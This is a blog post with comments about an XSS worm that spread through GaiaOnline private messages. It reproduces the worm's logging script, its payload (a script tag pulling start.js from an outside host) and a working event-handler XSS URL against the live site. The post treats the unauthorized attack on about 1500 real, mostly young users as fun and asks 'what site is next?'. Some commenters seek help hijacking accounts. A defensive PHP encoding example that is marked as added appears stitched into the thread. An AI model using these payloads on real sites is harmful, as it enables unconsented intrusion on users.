XSS Worm strikes GaiaOnline

GaiaOnline is a highly popular web based game, a perfect target for an XSS worm. That is exactly what Kyran set out to do, with a little help from Kuza. I’ll be writing about his worm, why it’s so special, the results he’s collected and the response from GaiaOnline.

Normally when you consider an XSS worm, such as the infamous Samy worm or the lesser known IPB ones, the one thing they have in common is how they spread. They abuse a filter flaw to store themselves in some permanent storage, such as the user’s profile or the user’s signature. This worm differs in that it uses only reflective XSS holes.

A reflective XSS hole is one where the input you provided is not stored anywhere; it is printed onto the page only because it was one of your input variables, usually sent via GET or POST (in this case POST).

Back to the worm. Kyran was not interested in causing havoc; this worm is merely an experiment to see how far a non-permanent worm can spread on a site with a reach of 40% (source). First I’ll give you the logging script he used.

log.php:

<head>
<title>Error!</title>
<meta http-equiv="refresh" content="0;url=http://www.gaiaonline.com">
</head>
<?php
// File to log to.
$myFile = "log.txt";
// Open the file for appending, or end execution if it can't be opened.
$fh = fopen($myFile, 'a') or die("can't open file");
// Take the username sent via POST from start.js (empty if absent) and put it in $stringData.
$stringData = isset($_POST["username"]) ? $_POST["username"] : "";
// Write the string to the file.
fwrite($fh, $stringData);
// Add a tilde followed by a newline to divide each entry.
$stringData = "~\n";
fwrite($fh, $stringData);
fclose($fh);
?>

As you can see he only logged the username, as he was not interested in actually taking control of any accounts. Sadly no timestamp was recorded with each entry, but I’m hedging my bets that next time there will be :p.

Now, onto the juicier bits: the worm. It’s not long (you won’t have to wade through something Samy-like again). In short it does this:

  1. Create the content that replaces the page.
  2. Set up an AJAX object.
  3. Create the variables used to send a PM (sending the PM to everyone in the victim’s friends list).
  4. Send the PM.

Gaia has a feature whereby if you send a PM to friends@gaia, the PM actually goes to everyone in your friends list. This allowed for an obvious shortcut in the code, but the worm would be perfectly possible without it; it would just require one extra AJAX request and some parsing. The payload of the PM is as follows:

"><script defer xsrc=//gaiaonli.site.com/start.js></script><style> (url changed)

As you can see it just pulls in the script again, which in turn sends the PM to everyone in the friends list. I’ve got a copy of the script here; I have changed the URLs of log.php and start.js in the code, but otherwise this is what start.js would have looked like.

That’s the worm. It can be argued that it is a persistent attack as it is stored in a PM, but as Kyran said, “the XSS is reflective, just the propagation method is persistent. But, that’s just semantics”.

What was logged through this worm? Kyran ran the worm for 3-4 hours (with a central .js file it’s easy to stop the worm) and logged 1500 unique usernames, but not much more can be deduced in terms of growth over time due to the lack of timestamps. Since the passwords weren’t logged we cannot check statistics on those, but I would hazard a guess at the statistics being similar to those of sites like MySpace. In any case, the point of this exercise was to see how well a reflective XSS worm can spread on a large site.

Kyran did post the worm (code included) on their forum, but that was quickly taken down by one of their mods. He created a new thread without the code in it, which has stayed up. Here’s Kyran’s summary of the second thread: “the staff haven’t posted anything. It’s mostly people calling me a terrorist”. As of yet they haven’t contacted him for any details (it is possible the mod who took down the first thread kept a copy of the code, in which case there is no need to contact Kyran if all they want to do is patch the hole).

What can be understood from this whole incident? Reflective XSS can viably be used to spread an effective worm, and sending variables via POST does not make people any safer. Considering how common reflective XSS is (34 pages of reflective XSS flaws) this is something web masters really need to get to grips with. Furthermore it’s clear that GaiaOnline aren’t ready for users reporting flaws: they don’t know what to do when a flaw is reported and they aren’t quick at fixing them (at the time of writing the flaw is still open).

Now… what site is next?

  • Anonymous

    What is Reach?

    Reach measures the number of users. Reach is typically expressed as the percentage of all Internet users who visit a given site. So, for example, if a site like yahoo.com has a reach of 28%, this means that if you took random samples of one million Internet users, you would on average find that 280,000 of them visit yahoo.com. Alexa expresses reach as number of users per million. Alexa’s one-week and three-month average reach are measures of daily reach, averaged over the specified time period. The reach rank is a ranking of all sites based solely on their reach. The three-month changes are determined by comparing a site’s current reach and reach rank with its values from three months ago.

    Note that the graph says reach (per million) not reach (in millions). Take a look at Alexa’s data for Yahoo. If reach was users in millions (like you moronically think) yahoo would be getting nearly 300,000 MILLION users a day… which is significantly more users than people on the planet! (~6.5 billion) Even if it was hits (in millions) you are talking about 45 hits for every person on the planet. Take the reach number, divide by a million, voilà, you have a percentage of “internet users” that gaiaonline gets in a day. We can leave the selection bias of alexa’s traffic information for another time…

  • http://www.whiteacid.org Sid

    Thanks, I did think it looked too high. My fault. I’ll edit the post.

  • http://www.script-sys.net/ Arethic (nate)

    The main issue isn’t the fact that users don’t know how to report these problems (personally I’ve pissed around with a few myself (Example here)), but the fact that they exist to begin with :/

    One major issue with Gaia is that it does push out new features often, and does okay generally with most of the shit, but tends to fall back on the sanitization too often.

    On a personal opinion, I can relate and understand the want to show a proof of concept issue, but personally I think ethically it coulda been done a bit better, cause the users on the site are mostly young, and clueless, and all this led to was a shit storm of “OMG WHAT HAPPENED?!?”.

    Personally I just prefer to nag a developer when I find one.

    Though I would rather see for the day when they actually either review their own code, or have someone review it for them to keep an eye for the damn exploits :/

  • http://www.whiteacid.org Sid

    While of course they shouldn’t exist to begin with, the odd one will occasionally slip through. As for their track record, that’s not something I would know about.

    Reporting the flaw may have worked, but isn’t this just so much more fun? Also… passwords weren’t logged and the user shouldn’t really have known anything happened (other than getting a strange PM), so I doubt it caused that much disturbance.

    Oh and they at least tried fixing it. You can no longer break out of the input element, as < and > aren’t working, but you can use event handlers as follows:
    http://www.gaiaonline.com/community/search.php?type=&val=%22%20onmouseover=%22alert('xss‘);%22%20%22

    As Kyran says: “I haven’t been contacted, nor punished. But they seem to have tried to fix it.”
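The post’s conclusion (reflective XSS is what webmasters need to get to grips with) and the comment above (stripping < and > still leaves event-handler injection through a double quote) both come down to output encoding in the right context. The following is an added example, not code from the original post, from Kyran or from GaiaOnline: it renders a request parameter into an input element’s value attribute the weak way and the correct way, and checks which one lets an on* attribute escape the quoted value. The parameter name val and the input-element context are taken from the comments; the function names, the constructed probe string and the check regex are my own.

```php
<?php
// Added example: encoding a reflected parameter for an HTML attribute context.
// Function names and the probe string below are constructed for this example.

// The kind of fix described in the comments: strip angle brackets only.
// Still exploitable, because a double quote closes the value attribute and an
// event-handler attribute needs neither < nor >.
function render_weak(string $val): string {
    $cleaned = str_replace(['<', '>'], '', $val);
    return '<input type="text" name="val" value="' . $cleaned . '">';
}

// Correct output encoding for a double-quoted attribute: htmlspecialchars with
// ENT_QUOTES encodes &, <, >, " and ', so the attribute cannot be closed early.
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function render_safe(string $val): string {
    $encoded = htmlspecialchars($val, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="val" value="' . $encoded . '">';
}

// Crude structural check used only by this example: a quote followed by
// whitespace and an on*= attribute means the value was closed and a handler
// was injected. Not a general XSS detector.
function has_injected_handler(string $html): bool {
    return (bool) preg_match('/"\s+on[a-z]+\s*=/i', $html);
}

// Constructed probe in the shape the comment describes, with the alert replaced
// by an inert marker word.
$probe = '" onmouseover="marker';

$weak = render_weak($probe);
$safe = render_safe($probe);

echo "weak: $weak\n";
echo "safe: $safe\n";

// Self-check: the weak rendering must be flagged, the safe one must not be.
if (!has_injected_handler($weak) || has_injected_handler($safe)) {
    fwrite(STDERR, "unexpected result\n");
    exit(1);
}
echo "weak rendering is injectable, encoded rendering is not\n";
```

Run it with the PHP CLI (php example.php). The point to take from it: filtering individual characters is the wrong model, because which characters are dangerous depends on where the value lands (attribute, element body, script, URL); encoding for the specific output context is what actually closes the hole.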

  • http://www.script-sys.net/ Arethic (nate)

    I’m pretty familiar with the track record sadly, I’ve found a few and reported them throughout the good time I’ve been on there.

    Mmmm, for me generally, I prefer keeping my exploits secret until I report it and know its fixed, that way other people can’t exploit it before it gets fixed (the main issue is the time it takes for a developer to get to his project, and commit the changes fully).

    As for kyran, he likely won’t get punished ultimately, unless it’s found he did log passwords and used said passwords to access any accounts, then they’d be pissed, but even with as silly (in my opinion : P) a way as this was done, they are likely happy it got fixed now without major exploitation in the worse ways it could have been done.

  • Mr.Riddles

    so… You’re the one who screwed up gaiaonline. Or at least for a little bit. Well now, the way you screwed it up may have been complex for me. But we shall see if you can try again. In my opinion you screwed gaia with a practice test? Pathetic senile bastard!

  • Admin Vince

    You will regret ever testing and making fun of gaiaonline.

  • http://www.whiteacid.org Sid

    Thanks for that very friendly comment, showing just how well you read the very first paragraph of my post. I really hope you aren’t representative of the Gaians as a whole.

  • The Question

    This little stunt will be posted and spread through gaia. You will be at your worst you piece of crap.

  • The Question

    Well now, so far only I have known. I read everything. Not twice but why’d you do it? What is your goal.

  • http://www.whiteacid.org Sid

    Why did Kyran make this worm? As I said in the post, to see how effective an XSS worm can be when using a reflective XSS as a means of growth.
    This did not mess up Gaias site, no settings in any profiles were changed, nothing permanent was done, no passwords were logged. The fact that the flaw exists does not make the Gaia admins look bad, a lot of major sites have XSS flaws, they do slip through the radar occasionally, that is understandable.

    What does make the admins look bad is that the flaw is still open (see http://blogs.securiteam.com/index.php/archives/786#comment-58101).

  • The Question

    So then, you just did that to prove how flawed gaiaonline was? You didn’t intend to harm it. Just prove to them that they need to work on some things?

  • http://www.whiteacid.org Sid

    I’ll say it again; I wrote this summary, nothing more.
    I think that was only a very minor goal. The other was to test a worm of this type (which as far as I know hasn’t been used before). GaiaOnline wasn’t picked on, MySpace could have been used too, Orkut, Tribalwars or one of many other sites could all have been potential targets.

  • http://www.script-sys.net/ Arethic (nate)

    *sigh* All you twits, just don’t post, seriously.

    They didn’t even ‘Mess up’ Gaia, it ultimately didn’t even do any damage, though it was one of the reasons I’m sure they are killing the whole friends@gaia system (again).

    Gaia itself, doesn’t even need to be ‘proved’ to that it has flaws, they know, they just don’t fix them generally because they aren’t openly hit like this.

    Sid: On a side note, no, none of those morons are Gaia’s administration or representatives at all.

    While the admins may not be quick to fix the flaw, they are at least generally respective to not troll and flame.

  • The Question

    Arethic (nate): Look, I’m not a moron nor am I a twit. And second, I never said I was representing gaiaonline admins or anything. You seriously have issues I know but see, knowing this I didn’t have to do a thing.

    Sid: I left you at your work.

    Arethic: oh and btw I bet you’re just a retard who has no life whatsoever and is trying to prove that you need some help.

  • http://www.script-sys.net/ Arethic (nate)

    *laughs* What a joke, I wasn’t even referring to you about the whole ‘representing Gaia’ thing actually, but just because you thought so, yes you are now officially a moron, sorry.

    *shrugs* I have a life, which is one reason I actually know what I’m talking about and you don’t, and can respect the aspects of Proof of Concept exploitations, and all you can do is bad mouth it ignorantly. You post behind a silly name and that’s it, I have no reason to hide who I am, I’ve done stuff big and made it popular, what have you succeeded in besides being an apparent troll?

    I don’t see anything I did that ‘Proved I need help’, if I needed help, I wouldn’t be here discussing this the way it should have been discussed towards sid, before you others came along with the petty comments.

  • http://www.gaiaonline.com Gaia Mom

    Yay! Worms that can help assholes take toys away from kids! Great idea!

    Not.

  • http://www.whiteacid.org Sid

    What do you mean by “take toys away from kids”?

    Edit: Do you mean that people could easily modify this worm to do some damage to gaiaonline and because of that people shouldn’t make these kind of proof of concepts? You mean like electricity should never have been made public as people can use it to electrocute people?

    ¬_¬

  • Former Gaian

    This is kinda funny to see some people taking offense to this, I’m more than sure that if you wanted to use this worm in a more destructive way and had the mental capacity to, your goals would be set a little higher than a “child’s toy”. An attack wasn’t made on Gaia, this was merely a test of an XSS worm on a highly populated web based game, which in my opinion could be graciously considered a healthy warning of exploitable flaws. Furthermore, that it was used and posted on a site where most users wouldn’t have a clue as to how to use it or edit it for malicious purposes, as opposed to let’s say myspace, is only evidence of the innocence of this program and its maker :P

    Sadly after writing all of this I see that this is long since dead but what the heck, I wrote it, I’m posting it

  • Janez

    Can u please tell me how to use this or can someone take the control of an account for me? please mail me!

  • Janez

    Contact me in Gaia my name is Cacafeona

  • Josh

    One thing I find strange is that the web is almost totally silent about a samy-like worm that plagued gaia a year before this one. Well, I for one remember it. I destroyed a bunch of CSS on people’s profiles replacing it with the worm.

  • cdnmeaa7

    I’ve got to say I’m very impressed that you guys figured and set this up. Many people are extremely pissed about this which makes me laugh, because if you think about it, it’s just a game. Although I didn’t understand most of that programming stuff, I know a lot more about it now than I did before, so thanks for the explanation designed for dunces like me. Hope you appreciate a little positive feedback.

  • jwells10

    where do I put these codes at

  • Miss Queen K

    Wooooow, some people need a life.
    I’m referring to the idiots who are trolling and asking how to use this bug for harm. As for the author and experiment conductor; I think you’ve done an excellent job at helping to warn us naive Gaians about our security risks and how easily we can be duped. Good job (Y) !